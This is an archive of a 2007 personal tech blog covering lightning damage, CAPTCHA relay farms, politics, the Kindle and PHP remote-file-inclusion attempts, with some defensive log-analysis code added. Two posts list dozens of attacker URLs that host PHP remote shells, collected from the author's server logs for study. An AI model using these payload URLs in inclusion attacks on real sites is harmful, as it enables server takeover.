22 Nov

Damn lightning…

Posted by jerry as lightning

I was awoken this morning by a storm coming in. I really hate that sound in the middle of the night, because my kids are very afraid of storms. I was counting to myself how long it would take to hear the first set of footsteps.

The rain picked up and the thunder rumbled on. The kids did come down as I expected. I convinced them to play in the family room and let my wife and me sleep a bit more.

It seemed like I had just fallen asleep when I heard an explosion and felt a blinding light shine through my closed eyes. It was really close. Probably hit a tree in my back yard. Nothing seemed out of place, other than the ghost-white kids in my doorway. The aquarium in my room was still working, and the bedroom light my oldest son turned on was sure as hell working.

My wife got up shortly after, and I went back to sleep.  (too many sleeping pills the night before - long story).  When I did wake up, I pulled my laptop out from under the bed, and unfortunately no Internet connection.

After a long morning of moving furniture and testing network ports, I found that I had 2 network cards die on me.  One in the new PC I had recently bought, and the other in the file server/firewall server in the basement.  I’ve spent a lot of money on lightning and surge protection for all of my equipment, including the cable modem, but apparently the EMP from the lightning induced a charge great enough to fry the two NICs.

Fortunately, I had some NICs lying around and got things running again, but that’s pretty frustrating. I am glad that it was nothing more serious, though.

21 Nov

Have CAPTCHAs been broken? Sort of…

Posted by jerry as Security, web site

I just read this article about the Hannah Montana ticket debacle, and how it points to an apparent weakness in CAPTCHA. Unfortunately for CAPTCHA, the problem wasn’t some slick new algorithm designed by a miscreant that can reliably decipher the images, but rather establishing a network that grabs the CAPTCHA from one site, shoots it to a porn or warez web site that presents the same CAPTCHA to someone looking to score some boobies, who must answer the CAPTCHA before getting their prize.

It’s really quite clever, and I anticipate that the CAPTCHA breaking network will continue to mature, as we have seen with other malware. Someone’s going to make a business case for hosting a service that has an input API that accepts an image and returns the CAPTCHA text, and a similar API that presents the CAPTCHA much like an online ad and accepts the CAPTCHA text as an input. Sites that present the CAPTCHA and return a “solution” are compensated in the same model as a click-through for an online ad - think of it as AdSense for bad people. Except, it would be perfectly acceptable for the site owner to sit there all night and answer CAPTCHAs on his or her site, raking in the money.

On the other side, those looking to break the CAPTCHA would have to pay a small fee for a certain number of CAPTCHA credits.  The money would flow to the site owners, with the service owner keeping a service charge, of course.

Honestly, that could spell the end for the widespread use of CAPTCHAs. The only way to stop this is to make the CAPTCHA too difficult to read for a human, and that defeats the whole purpose.

So, in effect, CAPTCHA was broken without really breaking it.
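The relay described above works because the solved text is portable: whoever types it, the bot submits it. What a site can still control is how long and for whom a solution is valid. The following is an added example, not code from the post, showing the server-side checks that raise the cost of a relayed solution: each challenge is bound to the session that requested it with an HMAC, expires after a short window, can be used exactly once, and failed attempts are rate-limited per session. The key, TTL and limit values are assumptions, not any site's real settings.

```python
"""Server-side CAPTCHA challenge issuance and verification that binds each
challenge to the requesting session, expires it quickly, allows one use, and
rate-limits failed attempts per session. Added illustration; the key, TTL and
limit below are assumed values, not any real site's configuration."""
import hashlib
import hmac
import secrets
import time

SECRET_KEY = b"assumed-per-deployment-secret"   # assumption: load from config in practice
TTL_SECONDS = 60                                  # assumption: window a relayed human must beat
MAX_FAILURES_PER_SESSION = 5                      # assumption


class CaptchaService:
    def __init__(self, clock=time.time):
        self._clock = clock        # injectable so the flow can be exercised with a fake clock
        self._issued = {}          # challenge_id -> (session_id, answer, issued_at)
        self._failures = {}        # session_id -> consecutive failed verifications

    def _sign(self, challenge_id, session_id, issued_at):
        msg = f"{challenge_id}|{session_id}|{issued_at}".encode()
        return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()

    def issue(self, session_id, answer):
        """Record a fresh challenge for this session. `answer` is whatever text the
        image renderer (out of scope here) drew; the caller embeds challenge_id,
        issued_at and token in the form next to the image."""
        challenge_id = secrets.token_hex(8)
        issued_at = int(self._clock())
        self._issued[challenge_id] = (session_id, answer, issued_at)
        return {"challenge_id": challenge_id, "issued_at": issued_at,
                "token": self._sign(challenge_id, session_id, issued_at)}

    def _fail(self, session_id):
        self._failures[session_id] = self._failures.get(session_id, 0) + 1

    def verify(self, session_id, challenge_id, issued_at, token, answer):
        """Return (ok, reason). A challenge is consumed on first verification, so a
        relayed answer cannot be retried against the same image."""
        issued_at = int(issued_at)
        if self._failures.get(session_id, 0) >= MAX_FAILURES_PER_SESSION:
            return False, "rate-limited"
        # The token proves this (challenge, session, time) triple was issued by us.
        if not hmac.compare_digest(self._sign(challenge_id, session_id, issued_at), token):
            self._fail(session_id)
            return False, "bad-token"
        record = self._issued.pop(challenge_id, None)   # single use: pop, never get
        if record is None:
            self._fail(session_id)
            return False, "unknown-or-already-used"
        rec_session, rec_answer, rec_issued = record
        if rec_session != session_id or rec_issued != issued_at:
            self._fail(session_id)
            return False, "session-mismatch"
        if self._clock() - rec_issued > TTL_SECONDS:
            return False, "expired"        # a slow relay round-trip lands here
        if not hmac.compare_digest(rec_answer.lower(), answer.strip().lower()):
            self._fail(session_id)
            return False, "wrong-answer"
        self._failures.pop(session_id, None)
        return True, "ok"
```

None of these checks defeats a live human on the other end of the relay; they only force the relay to complete its round-trip inside the TTL, from the session that fetched the image, without a second try. That is consistent with the point above: the checks raise the price per solved CAPTCHA rather than restore the human/bot distinction.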

20 Nov

Are domain parking companies complicit in typo-squatting?

Posted by jerry as web site

From this article:

“The domain name parking companies are providing a service. Whether or not you agree with the domain name owner’s decision to buy a certain domain name, it is not the parking company’s responsibility to police the internet and protect a company’s brand. That remains the responsibility of the brand itself. The brand or trademark owner should go after the domain owner, and not publicly lynch the domain parking companies:”

I would say that’s debatable. Think about some “real world” parallels:
Bootleg merchandise. The retailer did not manufacture the fake Nike shoes, he is just selling them. It’s not his responsibility to police the goods that move through his store - that’s the responsibility of the real manufacturer.

Pirated music. Napster, Grokster, BearShare, Gnutella, and on and on, all claimed that they just provided a service, that there were legitimate, legal uses for the service, and that it was not their responsibility to police what was going through.

Picture duplication.  Photo development companies claim that it’s not their responsibility to police what pictures they reproduce.  The copyright holder must do something to prevent unauthorized duplication.

In all those cases, the organization felt strongly in their footing. But the key is that each one lost in a big way. Like it or not, if you’re aiding in something that’s illegal, you’re complicit. The question is where you draw the line. Should ISPs have been held responsible in the music sharing cases? Probably not. Should the manufacturer of photo paper be held responsible for copyright infringement? Probably not. It’s a grey line, to be sure, but it seems pretty obvious that the domain parking companies are well on one side of the line. The only things missing now are lawsuits and legislation.

20 Nov

Conservatives Honing Gaydar?

Posted by jerry as politics

Given all of the wacky antics our conservative leadership has been, well, participating in, this, taken from Conservapedia, is pretty funny:

Make no mistake, it’s clearly been “stuffed” by someone out to “bone” the repubs, but funny none-the-less.

20 Nov

Electotainment

Posted by jerry as news, politics

I just finished reading this article and have to respond. The author doesn’t directly come out and say it, but is basically accusing the new media of dumbing down the political process, and we, the electorate, are the victims. We are NOT the victims… We are the cause. Have you seen what’s on TV lately? What are the most popular shows? American Idol, Dancing with the Stars, reality show du jour. The media is Pavlov’s dog, and the public has been in control of the bell for a long time. They are the monster that WE made.

It isn’t that CNN doesn’t want to let loose Hillary’s view on Yucca Mountain! CNN doesn’t want a million people saying “oh my god, this is boring shit. Let’s see what’s on Fox News. Maybe there’s a police chase or a good apartment fire we can watch.” And they’re right. I may be interested in Hillary’s view on Yucca Mountain, the credit collapse, the slowing economy, what to do with Iran, but I represent a small minority that probably doesn’t fit into their demographic anyway.

Up till recently, I hadn’t watched CNN or Fox News in about 2 years.  I was really bothered by what I saw when I did have a chance to watch it recently.  Every news show on CNN Headline News is presented by a “commentator”, not a reporter.  I could not believe that was Headline News.  It used to actually be 24 hours of an anchor person giving the news.  But, they’ve adapted to what the viewers want. 

For Pete’s sake, PLEASE STOP BLAMING THE MEDIA. They’re doing what they do best - sell advertising. They can’t sell advertising if no one watches their programming, because “hard hitting journalism” can’t compete with Dancing with the Stars.

20 Nov

Current crop of php include attempts

Posted by jerry as Hacking, Security, php

I’m not sure why I’m so fascinated by this crude and ineffective hacking attempt, but I am.  Here are the currently active hosts:

http://www.mta.cl/galeria2/galery2.jpg??
http://www.mta.cl/galeria2/galery.txt?
http://www.freewebtown.com/w8ting/safe.txt??
http://tools.aerofito.com/safeon.txt??
http://64.203.191.222/.check/c.txt?
http://www.ohanlonpaving.com/phpmic.txt.txt?
http://rotation.wooshck.org/image/safe.txt?
http://83.19.144.26/bo.do??
http://www.old2sold.net/newpitbulonspread.txt?
http://coolpc.com.tw/evaluate/safe?
http://www.ena-gmbh.de/download/cikos.txt?
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://www.freewebtown.com/komandan/tool/q3.txt?
http://www.manycontentz.com//ine/img/contr.txt??
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://electro.lydo.org/rfi/id.txt?
http://freewebs.com/chika_manis_banget/cmd.txt???
http://www.martinschaab.de/php/id.txt?
http://www.realtyna.com/about.gif??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.realtyna.com/safe.txt??
http://www.cluelesstravel.com/guestheath/id.txt??
http://bondick.net/flashchat/nick_image/htaccess?
http://kiopmanminsuion.chat.ru/http?
http://phila.wonbuddhism.info/bbs//skin/zero_vote/images/btn_black.gif?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.martinschaab.de/php/phpSecurePages//phpSecurePages/u.txt?

19 Nov

kindle hype

Posted by jerry as kindle

I’ve been bombarded with Kindle news everywhere I go today. “It’s going to revolutionize the e-reading market”. Really? How big is the e-reading market? Amazon seems to have really made the device as integrated and friendly as possible, but the reality is that you’re still stuck reading on a small screen. I don’t like reading emails on my BlackBerry. I hate web surfing on it, but I will in a pinch. I cannot see myself “curling up” with a PDA-sized device to read a book. It’s just not going to happen. This really goes back to the days of the Palm Pilot. I remember downloading ebooks to it, thinking to myself how cool it will be to have all these books with me wherever I go. But, I never read one of them. It was just not comfortable. I have a hard time reading a book on a 19″ LCD monitor.

The price is pretty steep as well. Buying the box for $399, then needing to spend $10 to $20 per book, just doesn’t seem likely. I like gadgets as much as the next guy, but I do not see myself spending money on this. In fact, I’ve been in a mode of device contraction. I had a phone, a Pocket PC, and an iPod. Now, I’m down to a BlackBerry and an iPod, and if I could get rid of the iPod, I would.

Having said all of that, the EVDO access to content is pretty slick.

19 Nov

PHP include attacks rolling on…

Posted by jerry as Hacking, Security, php, search engine, web site

I’ve written about this a bit, and I’ve started a current attack list on networkstike.com, but the intensity of these attempts seems to be increasing. I decided to Google one of the URLs that’s being included, and right off the bat I found this article from a web site that’s seeing the same thing. I believe these attacks are being launched from a botnet, trolling for vulnerable sites to use for some kind of illicit business.

What was really interesting to me in my google search for some of the inclusion URLs is the number of log files that are available and indexed via google.  For a long time, I have gotten many hits with the referral set to a spammy site - an obvious attempt to get some clicks and link mojo with Google.   I never really thought a lot about it, but I can see that it’s probably a fairly effective thing, given the number of log files I found via google.

The current list of php inclusion hits for my sites is below:

http://www.s1ko.jazztel.es/safe.gif?
http://gw-gold.net/dragoc/id.txt?
http://musicgirll.chat.ru/wav/mysong?
http://www.mta.cl/galeria2/galery.txt?
http://www.mta.cl/galeria2/galery.jpg?
http://www.madinaedu.gov.sa/safeon.txt??
http://www.modelismo.alternativo.nom.br//poll/polldata/readme.txt??
http://shellbr.com.sapo.pt/safeon.txt??
http://zamkad.ru/pub/buffer_upload/…/cmd.txt?
http://www.volontaridelrotary2040.com/html/modules/xt_conteudo/NewFile.txt?
http://telkomsex.com/ec.txt?
http://193.109.188.20/0/templates/rhuk_solarflare_ii/css/contr.txt??
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????
http://neu.sv-badbentheim.de/hide.txt?
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages2.gif???
http://www.smartlabphd.com/book/list/skin/zero_vote/images/setup_pages.gif???
http://www.urjb.com/photos/albums/userpics/10001/thumb_blank.gif??
http://www.hgbruce.com/components/com_rsgallery/safeon.txt??
http://tr-igus.com/safe.txt?
http://www.valerieataylor.com/gb/book2.gif??
http://servergazi.com/portal/images/stories/web.gif??
http://hackbsd.net/.xrt/safe.gif?
http://www.freewebtown.com/w8ting/safe.txt??
http://rumusic.chat.ru/rumusic.wav?
http://ninaru.hut2.ru/images/cs.txt?
http://amygirl.land.ru/baby?
http://www.martinschaab.de/php/id.txt?
http://x0.741.com/pb.txt?
http://location-investment.com/Connections/r8.txt?
http://jjisdfiuw834wsdd.chat.ru/js?

I’ve started downloading the files and looking at them. Many of them are loosely copied off of one another, some are exactly the same. Some are quite complex, all-in-one shells that would allow complete server control. Most of them appear to give some basic information, like directory, available disk space, effective UID and GID, and the like.
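Both of the inclusion lists on this page (the one in "Current crop of php include attempts" and the one above) are the kind of thing a log scanner can produce directly. What follows is an added example, not the post's own tooling or the networkstike.com list: it parses Apache combined-format lines, flags any query parameter whose value is an absolute URL (the signature of a PHP remote file inclusion attempt), and builds the distinct payload-URL list plus a per-client count. The log lines are constructed, using documentation IP ranges and a few of the payload URLs quoted above.

```python
"""Scan Apache combined-format access log lines for PHP remote-file-inclusion
attempts: any query parameter whose value is an absolute URL. Added example;
the log lines are constructed (documentation IP ranges, a few of the payload
URLs quoted in the post), not real traffic from the author's servers."""
import re
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample log. The last line carries the payload URL percent-encoded,
# which is why values are decoded before the scheme check.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Nov/2007:03:14:22 -0600] "GET /index.php?page=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.9 - - [20/Nov/2007:03:15:01 -0600] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Nov/2007:03:15:40 -0600] "GET /modules/show.php?inc=http://freewebs.com/chika_manis_banget/cmd.txt??? HTTP/1.1" 404 0 "-" "libwww-perl/5.805"',
    '203.0.113.7 - - [20/Nov/2007:03:16:02 -0600] "GET /index.php?page=http%3A%2F%2Fwww.freewebtown.com%2Fw8ting%2Fsafe.txt%3F%3F HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
]


def rfi_params(target):
    """Yield (param_name, remote_url) for every query parameter of a request
    target whose decoded value is an absolute URL."""
    query = urlsplit(target).query          # everything after the first '?'
    for part in query.split("&"):
        if "=" not in part:
            continue
        name, value = part.split("=", 1)
        value = unquote(value)
        if value.lower().startswith(REMOTE_SCHEMES):
            yield name, value


def scan(lines):
    """Return one hit record per (request, parameter) that looks like an inclusion attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                        # not a combined-format line; skip rather than guess
        for name, url in rfi_params(m["target"]):
            hits.append({"ip": m["ip"], "time": m["ts"], "param": name,
                         "url": url, "host": urlsplit(url).netloc,
                         "status": int(m["status"])})
    return hits


def payload_list(hits):
    """Distinct payload URLs with the trailing '?' padding removed: the same
    shape as the 'currently active hosts' lists kept in the post."""
    return sorted({h["url"].rstrip("?") for h in hits})


def by_client(hits):
    """Attempts per source address, to see which clients are the scanners."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["param"], "->", h["host"], h["status"])
    print(payload_list(found))
    print(by_client(found))
```

The trailing `?`, `??` or `???` on the listed URLs is not noise: when the vulnerable script appends a suffix such as `.php` or a path to the parameter before calling `include`, the question mark turns that suffix into a query string, so the remote host still serves the payload file. That is also why `rstrip("?")` is the right normalization for building the list. A legitimate redirector or proxy parameter that carries a full URL will be flagged too, so treat the output as a review list rather than a block list; on the server side, `allow_url_include` (and, for older code paths, `allow_url_fopen`) switched off in php.ini is what actually stops the include from fetching anything remote.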

16 Nov

NSA Encryption backdoor?

Posted by jerry as NSA, Security, conspiracy, encryption

I am always skeptical of conspiracy in a given situation. The article is basically claiming that the NSA knowingly put a backdoor key into an algorithm, then forced it into the standard doc. Oh, and it’s apparently ‘obvious’ that secret keys exist, whether known or unknown.

This reminds me a lot of the debate about the S-boxes used in DES - the assumption was that the government did it to be able to crack DES, but it turned out to be an intentional design element that actually increased the security of DES.

I can think of a few scenarios off hand:

1. The creator knew about the weakness and intentionally chose values that are very difficult to reverse engineer. The algorithm is still secure enough to be trusted in spite of this.

2. No such second set of numbers is available, and this is a misunderstanding.

3. The creator legitimately did not know about the issue. People in the NSA are crapping bricks now.

4. There in fact is a secret set of numbers in the algorithm, and the NSA has a specific use in government applications for a computationally intensive, recoverable application. They know that general use is not likely because of those two facts.

I can see some utility in a computationally expensive encryption algorithm. I have to believe that the NSA didn’t ‘sneak’ in an algorithm that is so obviously inferior, expecting the world at large to use it so they can snoop. Despite Iraq and 9/11, they really aren’t a dumb organization.

I think the real story here is that we have to be so suspicious of the motives of our government. Given the many spying stories, the telecom amnesty issue, Guantanamo Bay, the TSA, etc, it seems like a plausible story that the NSA really would do such a thing.  In that light, maybe I’m wrong - maybe they did try to pull one over on us. One thing’s for sure - we’ll never get an answer we can trust from the CIA.

12 Nov

Strange happenings at Microsoft’s Search Engine

Posted by jerry as search engine

So, with all of the looking at logs I’ve been doing lately, I noticed something really unusual. Visits from hosts in the same range as the normal MSN bot that appear to be downloading whole pages (css, images, etc), referred from a search that looks like this:

http://search.live.com/results.aspx?q=myself&mrt=en-us&FORM=LIVSOP

The keywords keep changing, and they are landing at different sites. My theory is that MSN is going through and validating the search results for different terms, and analyzing the whole page - probably in an attempt to stop spam. I suspect that it is running through the entire index of terms that are associated with the site and “viewing” each in turn.

I’m seeing this activity for all of the sites I own and manage.

This appears to have been going on for about a week now. Hopefully MSN is on to something that will help reduce the amount of spam in their search results.
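To turn the observation into something checkable in a log, here is an added example, not code from the post: it parses combined-format log lines, keeps only requests whose referrer is a search.live.com results page (the example referrer quoted above is one of them), groups the hits by /24, and flags ranges that cycle through several search terms while also fetching CSS and image files with the search referrer still attached. That last behaviour is an assumption drawn from the post's description of the bot; a normal browser sends the page, not the search engine, as the referrer for assets. The sample log lines are constructed, and the IPs are documentation ranges, not MSN's real bot addresses.

```python
"""Profile search-referred visits per /24 to spot a crawler that replays search
result pages. Added example with constructed log lines; the address ranges are
documentation prefixes, not MSN's, and the asset-referrer behaviour is assumed."""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<path>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
SEARCH_HOSTS = {"search.live.com"}
ASSET_EXT = (".css", ".js", ".gif", ".jpg", ".png", ".ico")

# Constructed sample: three hosts in one /24 arriving with three different search
# terms and pulling assets with the search referrer, plus one ordinary visitor.
SAMPLE_LOG = [
    '203.0.113.10 - - [12/Nov/2007:10:00:01 -0600] "GET /index.php HTTP/1.1" 200 5120 "http://search.live.com/results.aspx?q=myself&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0"',
    '203.0.113.10 - - [12/Nov/2007:10:00:02 -0600] "GET /style.css HTTP/1.1" 200 800 "http://search.live.com/results.aspx?q=myself&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0"',
    '203.0.113.11 - - [12/Nov/2007:10:00:05 -0600] "GET /blog/ HTTP/1.1" 200 7000 "http://search.live.com/results.aspx?q=php+include&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0"',
    '203.0.113.11 - - [12/Nov/2007:10:00:06 -0600] "GET /images/header.gif HTTP/1.1" 200 3000 "http://search.live.com/results.aspx?q=php+include&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0"',
    '203.0.113.12 - - [12/Nov/2007:10:00:09 -0600] "GET /kindle/ HTTP/1.1" 200 6000 "http://search.live.com/results.aspx?q=kindle+hype&mrt=en-us&FORM=LIVSOP" "Mozilla/4.0"',
    '198.51.100.5 - - [12/Nov/2007:10:02:00 -0600] "GET /index.php HTTP/1.1" 200 5120 "http://search.live.com/results.aspx?q=jerry+blog&mrt=en-us&FORM=LIVSOP" "Mozilla/5.0"',
    '198.51.100.5 - - [12/Nov/2007:10:02:01 -0600] "GET /style.css HTTP/1.1" 200 800 "http://www.example.com/index.php" "Mozilla/5.0"',
]


def search_term(referer):
    """Return the q= term if the referrer is a Live Search results page, else None."""
    parts = urlsplit(referer)
    if parts.netloc.lower() not in SEARCH_HOSTS:
        return None
    terms = parse_qs(parts.query).get("q")   # parse_qs also turns '+' into spaces
    return terms[0] if terms else None


def profile_ranges(lines, prefix=24):
    """Per /prefix network: distinct search terms seen in referrers, and how many
    page versus asset requests carried a search referrer."""
    stats = defaultdict(lambda: {"terms": set(), "asset_hits": 0, "page_hits": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        term = search_term(m["referer"])
        if term is None:
            continue                          # only search-referred requests matter here
        net = ipaddress.ip_network(f"{m['ip']}/{prefix}", strict=False)
        entry = stats[str(net)]
        entry["terms"].add(term)
        if m["path"].lower().endswith(ASSET_EXT):
            entry["asset_hits"] += 1
        else:
            entry["page_hits"] += 1
    return stats


def suspicious_ranges(stats, min_terms=3, min_assets=1):
    """Ranges that look like the crawler in the post: many distinct search terms
    from one /24, and asset fetches that still name the search page as referrer."""
    return sorted(net for net, s in stats.items()
                  if len(s["terms"]) >= min_terms and s["asset_hits"] >= min_assets)


if __name__ == "__main__":
    profile = profile_ranges(SAMPLE_LOG)
    for net, s in profile.items():
        print(net, sorted(s["terms"]), "pages:", s["page_hits"], "assets:", s["asset_hits"])
    print("suspicious:", suspicious_ranges(profile))
```

The thresholds are deliberately loose; the useful output is the per-range term list, which is what lets you confirm (or refute) the "running through the entire index of terms" theory by comparing it against the keywords you already rank for.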